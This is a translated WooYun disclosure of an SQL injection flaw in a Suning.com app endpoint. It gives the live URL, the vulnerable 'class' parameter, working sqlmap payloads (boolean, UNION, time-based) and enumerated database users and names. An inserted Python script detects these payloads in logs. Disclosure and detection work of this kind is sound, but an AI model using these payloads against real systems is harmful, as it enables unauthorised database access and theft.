
Vulnerability summary

Defect ID: wooyun-2014-060269

Title: One of the SQL injection vulnerabilities in a Suning.com APP (root privileges)

Vendor: 江苏苏宁易购电子商务有限公司 (Jiangsu Suning.com E-Commerce Co., Ltd.)

Author:

Submitted: 2014-05-11 13:21

Fix time: 2014-06-25 13:22

Disclosed: 2014-06-25 13:22

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:


Vulnerability details

Disclosure timeline:

2014-05-11: Details sent to the vendor, awaiting vendor response
2014-05-12: Vendor confirmed; details disclosed to the vendor only
2014-05-22: Details disclosed to core white hats and domain experts
2014-06-01: Details disclosed to regular white hats
2014-06-11: Details disclosed to intern white hats
2014-06-25: Details disclosed to the public

Brief description:

SQL injection

Detailed description:

I downloaded the "Suning App Store" app from the official Suning.com client..
After some testing I obtained this link:

http://appjson.suning.com/advertise.php?page=1&limit=2&sys=android&class=102
The class parameter is injectable..


---
Place: GET
Parameter: class
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=1&limit=2&sys=android&class=102 AND 5199=5199
Type: UNION query
Title: MySQL UNION query (NULL) - 10 columns
Payload: page=1&limit=2&sys=android&class=102 UNION ALL SELECT NULL,CONCAT(0x7166637271,0x7a62704f57775474664d,0x71736a6771),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: page=1&limit=2&sys=android&class=102 AND SLEEP(5)
---
[01:38:32] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.6
back-end DBMS: MySQL 5.0.11
[01:38:32] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\output\appjson.suning.com'
[*] shutting down at 01:38:32


---
[01:39:35] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.6
back-end DBMS: MySQL 5.0.11
[01:39:35] [INFO] fetching database users privileges
database management system users privileges:
[*] 'root'@'192.168.123.%' [1]:
privilege: USAGE
[01:39:36] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\output\appjson.suning.com'
[*] shutting down at 01:39:36


available databases [6]:

[*] information_schema
[*] suning
[*] suning_app_inner
[*] suning_ios
[*] suning_win
[*] test


Database: suning
[233 tables]
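As an added example (not part of the original report or of the vendor's code), the following Python flags the three injection techniques sqlmap reported against the class parameter (boolean tautology, UNION SELECT, SLEEP) in access-log lines, and also flags any non-integer value in page, limit or class, which is the server-side allowlist a fix for advertise.php would enforce. The nginx log lines, IP address and timestamps are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed nginx access-log lines (not real traffic) modelled on the three
# sqlmap payload types in the report, plus one benign request. IPs are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [11/May/2014:01:38:30 +0800] "GET /advertise.php?page=1&limit=2&sys=android&class=102 HTTP/1.1" 200 512
10.0.0.5 - - [11/May/2014:01:38:31 +0800] "GET /advertise.php?page=1&limit=2&sys=android&class=102%20AND%205199%3D5199 HTTP/1.1" 200 512
10.0.0.5 - - [11/May/2014:01:38:32 +0800] "GET /advertise.php?page=1&limit=2&sys=android&class=102%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7166637271%2C0x7a62704f57775474664d%29%2CNULL%23 HTTP/1.1" 200 640
10.0.0.5 - - [11/May/2014:01:38:33 +0800] "GET /advertise.php?page=1&limit=2&sys=android&class=102%20AND%20SLEEP%285%29 HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# One signature per technique sqlmap reported against the class parameter.
# Matched against the URL-decoded, lower-cased parameter value.
SIGNATURES = {
    "boolean-based": re.compile(r"\b(and|or)\s+(\d+)\s*=\s*\2\b"),   # AND 5199=5199
    "union": re.compile(r"\bunion\s+(all\s+)?select\b"),              # UNION ALL SELECT
    "time-based": re.compile(r"\b(sleep|benchmark)\s*\("),            # AND SLEEP(5)
}

# advertise.php's page, limit and class are numeric ids; the fix is to enforce
# exactly that allowlist server-side before the value ever reaches a query.
NUMERIC_PARAMS = ("page", "limit", "class")


def classify_param(value):
    """Names of the injection signatures matching one parameter value."""
    decoded = unquote_plus(value).lower()   # second decode catches double-encoding
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan_log(text):
    """Return (line_no, param, techniques) for every request that trips a
    signature or carries a non-integer value in a numeric-only parameter."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for key, value in parse_qsl(query, keep_blank_values=True):
            techniques = classify_param(value)
            if techniques or (key in NUMERIC_PARAMS and not value.isdigit()):
                hits.append((n, key, techniques))
    return hits


if __name__ == "__main__":
    for line_no, param, techniques in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: parameter {param!r} -> {techniques or ['non-integer value']}")
```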

Proof of vulnerability:

Fix recommendation:

You're the experts here. By the way, you won't give just 10 Rank, right? Asking for 15-20 Rank..

Copyright notice: please credit @乌云 when reposting


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed at: 2014-05-12 10:16

Vendor reply:

Thank you for your attention to Suning.com; we are assigning staff to fix this vulnerability.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2014-05-18 12:25 | Mosuan ( Regular white hat | Rank:449 Vulnerabilities:175 | Retiring this account, no more showing off, goodbye kids. by Mosua...)

    Legend